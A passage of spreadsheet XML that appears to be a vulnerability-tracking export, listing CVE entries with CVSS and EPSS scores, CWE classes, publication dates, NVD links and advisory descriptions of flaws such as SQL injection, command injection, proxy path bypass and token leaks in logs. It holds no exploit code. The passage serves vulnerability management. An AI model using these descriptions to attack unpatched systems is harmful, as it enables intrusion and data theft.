      <c r="M1069" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87617</t>
        </is>
      </c>
    </row>
    <row r="1070">
      <c r="A1070" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1070" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87625</t>
        </is>
      </c>
      <c r="C1070" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1070" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1070" s="5" t="inlineStr"/>
      <c r="F1070" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1070" s="5" t="inlineStr"/>
      <c r="H1070" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1070" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1070" s="5" t="inlineStr"/>
      <c r="K1070" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1070" s="5" t="inlineStr">
        <is>
          <t>Use after free in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to execute arbitrary code inside the sandbox via a crafted Chrome extension. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1070" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87625</t>
        </is>
      </c>
    </row>
    <row r="1071">
      <c r="A1071" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1071" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87636</t>
        </is>
      </c>
      <c r="C1071" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1071" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1071" s="5" t="inlineStr"/>
      <c r="F1071" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1071" s="5" t="inlineStr"/>
      <c r="H1071" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1071" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1071" s="5" t="inlineStr"/>
      <c r="K1071" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L1071" s="5" t="inlineStr">
        <is>
          <t>Type confusion in XML in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1071" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87636</t>
        </is>
      </c>
    </row>
    <row r="1072">
      <c r="A1072" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1072" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87766</t>
        </is>
      </c>
      <c r="C1072" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1072" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1072" s="5" t="inlineStr"/>
      <c r="F1072" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1072" s="5" t="inlineStr"/>
      <c r="H1072" s="5" t="inlineStr"/>
      <c r="I1072" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1072" s="5" t="inlineStr"/>
      <c r="K1072" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L1072" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in bubblewrap. During sandbox setup, creating files or directories under the new root can follow a parent symlink onto the host via /oldroot, writing attacker-chosen paths outside the sandbox as the launching user. This happens before the sandboxed process starts. This issue is GHSA-pxhw-h44j-8pfx. It is fixed in bubblewrap 0.12.0.</t>
        </is>
      </c>
      <c r="M1072" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87766</t>
        </is>
      </c>
    </row>
    <row r="1073">
      <c r="A1073" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1073" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87795</t>
        </is>
      </c>
      <c r="C1073" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1073" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1073" s="5" t="inlineStr"/>
      <c r="F1073" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1073" s="5" t="inlineStr"/>
      <c r="H1073" s="5" t="inlineStr"/>
      <c r="I1073" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1073" s="5" t="inlineStr"/>
      <c r="K1073" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1073" s="5" t="inlineStr">
        <is>
          <t>zstd-jni versions before 1.5.7-14 fail to validate offset and length parameters in the ZstdDictCompress constructor, allowing out-of-bounds memory reads. Attackers can supply untrusted offset or length values to read native heap memory into the compression dictionary, typically causing JVM crashes.</t>
        </is>
      </c>
      <c r="M1073" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87795</t>
        </is>
      </c>
    </row>
    <row r="1074">
      <c r="A1074" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1074" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87823</t>
        </is>
      </c>
      <c r="C1074" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1074" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1074" s="5" t="inlineStr"/>
      <c r="F1074" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1074" s="5" t="inlineStr"/>
      <c r="H1074" s="5" t="inlineStr"/>
      <c r="I1074" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1074" s="5" t="inlineStr"/>
      <c r="K1074" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L1074" s="5" t="inlineStr">
        <is>
          <t>zstd-jni before 1.5.7-14 performs 32-bit signed bounds checks on three direct-ByteBuffer frame-size native methods, allowing out-of-bounds memory reads via negative or overflowing offsets. Attackers can supply negative offset values near Integer.MIN_VALUE to read unmapped memory, causing JVM termination or extracting arbitrary frame size data from unintended memory locations.</t>
        </is>
      </c>
      <c r="M1074" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87823</t>
        </is>
      </c>
    </row>
    <row r="1075">
      <c r="A1075" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1075" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87927</t>
        </is>
      </c>
      <c r="C1075" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1075" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1075" s="5" t="inlineStr"/>
      <c r="F1075" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1075" s="5" t="inlineStr"/>
      <c r="H1075" s="5" t="inlineStr"/>
      <c r="I1075" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1075" s="5" t="inlineStr"/>
      <c r="K1075" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="L1075" s="5" t="inlineStr">
        <is>
          <t>MaxSite CMS through 109.6 contains a local file inclusion vulnerability in the ajax and require-maxsite dispatchers that allows unauthenticated attackers to execute privileged handler files by supplying base64-encoded path traversal sequences. Attackers can bypass path validation checks and execute admin-gated handler actions without authentication to access sensitive functionality.</t>
        </is>
      </c>
      <c r="M1075" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87927</t>
        </is>
      </c>
    </row>
    <row r="1076">
      <c r="A1076" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1076" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88009</t>
        </is>
      </c>
      <c r="C1076" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1076" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1076" s="5" t="inlineStr"/>
      <c r="F1076" s="5" t="inlineStr"/>
      <c r="G1076" s="5" t="inlineStr"/>
      <c r="H1076" s="5" t="inlineStr"/>
      <c r="I1076" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1076" s="5" t="inlineStr"/>
      <c r="K1076" s="5" t="inlineStr">
        <is>
          <t>CWE-1286, CWE-444</t>
        </is>
      </c>
      <c r="L1076" s="5" t="inlineStr">
        <is>
          <t>Traefik is an open source HTTP reverse proxy and load balancer. Prior to 2.11.57, and 3.7.13, Traefik accepts a rootless HTTP/1 request target that Go stores in URL.Opaque while leaving URL.Path empty. The rewriteRequestBuilder path evaluates routing, path sanitization, forwardAuth, encodedCharacters, and access logging against a path normalized to / but forwards URL.Opaque verbatim to the backend, allowing cross-vhost routing bypass, path-scoped authorization bypass, and access-log evasion when the backend interprets the opaque target as a path. This issue is fixed in 2.11.57 and 3.7.13.</t>
        </is>
      </c>
      <c r="M1076" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88009</t>
        </is>
      </c>
    </row>
    <row r="1077">
      <c r="A1077" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1077" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88271</t>
        </is>
      </c>
      <c r="C1077" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1077" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1077" s="5" t="inlineStr"/>
      <c r="F1077" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1077" s="5" t="inlineStr"/>
      <c r="H1077" s="5" t="inlineStr"/>
      <c r="I1077" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1077" s="5" t="inlineStr"/>
      <c r="K1077" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1077" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 allows a Guest user to overwrite device configuration and replace the administrator password through SSVR.</t>
        </is>
      </c>
      <c r="M1077" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88271</t>
        </is>
      </c>
    </row>
    <row r="1078">
      <c r="A1078" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1078" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88277</t>
        </is>
      </c>
      <c r="C1078" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1078" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1078" s="5" t="inlineStr"/>
      <c r="F1078" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1078" s="5" t="inlineStr"/>
      <c r="H1078" s="5" t="inlineStr"/>
      <c r="I1078" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1078" s="5" t="inlineStr"/>
      <c r="K1078" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1078" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 allows an authenticated ONVIF user to inject shell commands through ConsumerReference.Address and execute arbitrary commands as root.</t>
        </is>
      </c>
      <c r="M1078" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88277</t>
        </is>
      </c>
    </row>
    <row r="1079">
      <c r="A1079" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1079" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89046</t>
        </is>
      </c>
      <c r="C1079" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1079" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1079" s="5" t="inlineStr"/>
      <c r="F1079" s="5" t="inlineStr"/>
      <c r="G1079" s="5" t="inlineStr"/>
      <c r="H1079" s="5" t="inlineStr"/>
      <c r="I1079" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1079" s="5" t="inlineStr"/>
      <c r="K1079" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1079" s="5" t="inlineStr">
        <is>
          <t>zstd-jni versions 1.5.5-6 through 1.5.7-13 contain an out-of-bounds read vulnerability in Zstd.getFrameContentSize that fails to validate negative srcPosition arguments. Attackers can supply negative offset values that bypass bounds checks and reach the native frame-header parser, causing out-of-bounds memory reads that lead to information disclosure or JVM crashes.</t>
        </is>
      </c>
      <c r="M1079" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89046</t>
        </is>
      </c>
    </row>
    <row r="1080">
      <c r="A1080" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1080" s="5" t="inlineStr">
        <is>
          <t>CVE-2016-20097</t>
        </is>
      </c>
      <c r="C1080" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1080" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1080" s="5" t="inlineStr"/>
      <c r="F1080" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1080" s="5" t="inlineStr"/>
      <c r="H1080" s="5" t="inlineStr"/>
      <c r="I1080" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1080" s="5" t="inlineStr"/>
      <c r="K1080" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1080" s="5" t="inlineStr">
        <is>
          <t>Weaver (Fanwei) E-cology 8.0 contains a SQL injection vulnerability in the SignatureDownLoad servlet that allows unauthenticated remote attackers to read arbitrary files by injecting a UNION SELECT payload into the markId GET parameter, which is concatenated unsanitized into a SQL query. Attackers can control the markPath value returned by the query to supply an attacker-controlled filesystem path, causing the servlet to read and stream back arbitrary files accessible to the application server process, including sensitive configuration files containing database credentials. Disclosure materials indicate that this vulnerability has been remediated, but it's unclear which version resolved the issue. Exploitation evidence was first observed by the Shadowserver Foundation on 2023-10-18 (UTC).</t>
        </is>
      </c>
      <c r="M1080" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2016-20097</t>
        </is>
      </c>
    </row>
    <row r="1081">
      <c r="A1081" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1081" s="5" t="inlineStr">
        <is>
          <t>CVE-2019-25765</t>
        </is>
      </c>
      <c r="C1081" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1081" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1081" s="5" t="inlineStr"/>
      <c r="F1081" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1081" s="5" t="inlineStr"/>
      <c r="H1081" s="5" t="inlineStr"/>
      <c r="I1081" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1081" s="5" t="inlineStr"/>
      <c r="K1081" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1081" s="5" t="inlineStr">
        <is>
          <t>ASP-CMS contains a SQL injection vulnerability in the commentList.asp endpoint that allows unauthenticated remote attackers to inject arbitrary SQL by manipulating the id parameter in GET requests to the comment listing script. Attackers can bypass the application's keyword blocklist by interleaving the string 'master' within blocked SQL terms to extract sensitive database contents. Exploitation evidence was first observed by the Shadowserver Foundation on 2023-10-18 (UTC).</t>
        </is>
      </c>
      <c r="M1081" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2019-25765</t>
        </is>
      </c>
    </row>
    <row r="1082">
      <c r="A1082" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1082" s="5" t="inlineStr">
        <is>
          <t>CVE-2019-25766</t>
        </is>
      </c>
      <c r="C1082" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1082" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1082" s="5" t="inlineStr"/>
      <c r="F1082" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1082" s="5" t="inlineStr"/>
      <c r="H1082" s="5" t="inlineStr"/>
      <c r="I1082" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1082" s="5" t="inlineStr"/>
      <c r="K1082" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L1082" s="5" t="inlineStr">
        <is>
          <t>Renovate versions &gt;= 13.87.0 and &lt;= 19.38.6 leak temporary repository tokens into pull request comments during certain Go Modules update failure scenarios. The issue is fixed in version 19.38.7. Anyone able to view the affected pull request comments could obtain the exposed tokens.</t>
        </is>
      </c>
      <c r="M1082" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2019-25766</t>
        </is>
      </c>
    </row>
    <row r="1083">
      <c r="A1083" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1083" s="5" t="inlineStr">
        <is>
          <t>CVE-2020-37267</t>
        </is>
      </c>
      <c r="C1083" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1083" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1083" s="5" t="inlineStr"/>
      <c r="F1083" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1083" s="5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="H1083" s="5" t="inlineStr"/>
      <c r="I1083" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1083" s="5" t="inlineStr"/>
      <c r="K1083" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="L1083" s="5" t="inlineStr">
        <is>
          <t>Renovate versions &gt;=19.180.0 and &lt;23.25.1, when used with Azure DevOps, may expose the bot's authorization token in server or pipeline logs because the git http.extraheader=AUTHORIZATION parameter is logged without redaction. Anyone with access to saved logs could obtain the bot credentials. Fixed in 23.25.1; Azure DevOps users should revoke and regenerate credentials if logs may have been exposed.</t>
        </is>
      </c>
      <c r="M1083" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2020-37267</t>
        </is>
      </c>
    </row>
    <row r="1084">
      <c r="A1084" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1084" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-50997</t>
        </is>
      </c>
      <c r="C1084" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1084" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1084" s="5" t="inlineStr"/>
      <c r="F1084" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1084" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1084" s="5" t="inlineStr"/>
      <c r="I1084" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1084" s="5" t="inlineStr"/>
      <c r="K1084" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1084" s="5" t="inlineStr">
        <is>
          <t>Weaver (Fanwei) E-cology 8.0 and 9.0 contains a SQL injection vulnerability in the HrmCareerApplyPerView.jsp endpoint that allows unauthenticated remote attackers to extract arbitrary data from the backend database by manipulating the id GET parameter. Attackers can send a single crafted GET request with UNION-based injection payloads through the unsanitized id parameter to retrieve arbitrary data from the Microsoft SQL Server backend. This vulnerability is potentially remediated in software version 10.53 or 10.54. Exploitation evidence was first observed by the Shadowserver Foundation on 2023-10-18 (UTC).</t>
        </is>
      </c>
      <c r="M1084" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-50997</t>
        </is>
      </c>
    </row>
    <row r="1085">
      <c r="A1085" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1085" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-51009</t>
        </is>
      </c>
      <c r="C1085" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1085" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1085" s="5" t="inlineStr"/>
      <c r="F1085" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1085" s="5" t="inlineStr"/>
      <c r="H1085" s="5" t="inlineStr"/>
      <c r="I1085" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1085" s="5" t="inlineStr"/>
      <c r="K1085" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="L1085" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 4.7.2 fails to properly handle exceptions from the adhocore/json-comment library when parsing skin geometry data. Attackers can send login or skin packets with invalid geometry JSON to trigger an unhandled RuntimeException, causing server crash.</t>
        </is>
      </c>
      <c r="M1085" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-51009</t>
        </is>
      </c>
    </row>
    <row r="1086">
      <c r="A1086" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1086" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-51017</t>
        </is>
      </c>
      <c r="C1086" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1086" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1086" s="5" t="inlineStr"/>
      <c r="F1086" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1086" s="5" t="inlineStr"/>
      <c r="H1086" s="5" t="inlineStr"/>
      <c r="I1086" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1086" s="5" t="inlineStr"/>
      <c r="K1086" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1086" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 3.26.5 and 4.0.5 fail to validate the length of skin data fields submitted by players, allowing uncapped values to exceed the 32767 byte TAG_String limit. Attackers can submit oversized skin data fields like skinID or geometryName to trigger exceptions during NBT data serialization, causing server crashes.</t>
        </is>
      </c>
      <c r="M1086" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-51017</t>
        </is>
      </c>
    </row>
    <row r="1087">
      <c r="A1087" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1087" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54355</t>
        </is>
      </c>
      <c r="C1087" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1087" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1087" s="5" t="inlineStr"/>
      <c r="F1087" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1087" s="5" t="inlineStr"/>
      <c r="H1087" s="5" t="inlineStr"/>
      <c r="I1087" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1087" s="5" t="inlineStr"/>
      <c r="K1087" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L1087" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.3.1 and 4.23.1 fail to validate that the identityPublicKey in LoginPacket uses the required secp384r1 elliptic curve. Attackers can provide LoginPackets with keys using different curves or non-EC key types to pass login verification but trigger an uncaught exception during ECDH key derivation, crashing the server.</t>
        </is>
      </c>
      <c r="M1087" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54355</t>
        </is>
      </c>
    </row>
    <row r="1088">
      <c r="A1088" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1088" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54390</t>
        </is>
      </c>
      <c r="C1088" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1088" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1088" s="5" t="inlineStr"/>
      <c r="F1088" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1088" s="5" t="inlineStr"/>
      <c r="H1088" s="5" t="inlineStr"/>
      <c r="I1088" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1088" s="5" t="inlineStr"/>
      <c r="K1088" s="5" t="inlineStr">
        <is>
          <t>CWE-1025</t>
        </is>
      </c>
      <c r="L1088" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.3.1 and 4.23.1 contain a denial of service vulnerability in LoginPacket JSON parsing due to improper null value handling in arrays. Attackers can send malformed JSON with unexpected null elements in LoginPacket to crash the server.</t>
        </is>
      </c>
      <c r="M1088" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54390</t>
        </is>
      </c>
    </row>
    <row r="1089">
      <c r="A1089" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1089" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54393</t>
        </is>
      </c>
      <c r="C1089" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1089" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1089" s="5" t="inlineStr"/>
      <c r="F1089" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1089" s="5" t="inlineStr"/>
      <c r="H1089" s="5" t="inlineStr"/>
      <c r="I1089" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1089" s="5" t="inlineStr"/>
      <c r="K1089" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L1089" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 4.20.5 contain a denial of service vulnerability in LoginPacket JSON parsing due to improper validation in the JsonMapper dependency. Attackers can send malformed JSON structures in LoginPacket to crash the server.</t>
        </is>
      </c>
      <c r="M1089" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54393</t>
        </is>
      </c>
    </row>
    <row r="1090">
      <c r="A1090" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1090" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58374</t>
        </is>
      </c>
      <c r="C1090" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1090" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1090" s="5" t="inlineStr"/>
      <c r="F1090" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1090" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1090" s="5" t="inlineStr"/>
      <c r="I1090" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1090" s="5" t="inlineStr"/>
      <c r="K1090" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L1090" s="5" t="inlineStr">
        <is>
          <t>Hongjing e-HR contains an unauthenticated SQL injection vulnerability in the getSdutyTree servlet endpoint that allows remote unauthenticated attackers to access protected resources by supplying a path traversal sequence in the request URI to bypass the oauthservlet authentication filter. Attackers can inject UNION-based SQL payloads through the unsanitized codeitemid parameter into the underlying Microsoft SQL Server query to retrieve sensitive database contents including user credentials. Exploitation evidence was first observed by the Shadowserver Foundation on 2024-07-30 (UTC).</t>
        </is>
      </c>
      <c r="M1090" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58374</t>
        </is>
      </c>
    </row>
    <row r="1091">
      <c r="A1091" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1091" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58375</t>
        </is>
      </c>
      <c r="C1091" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1091" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1091" s="5" t="inlineStr"/>
      <c r="F1091" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1091" s="5" t="inlineStr"/>
      <c r="H1091" s="5" t="inlineStr"/>
      <c r="I1091" s="5" t="inlineStr">
        <is>
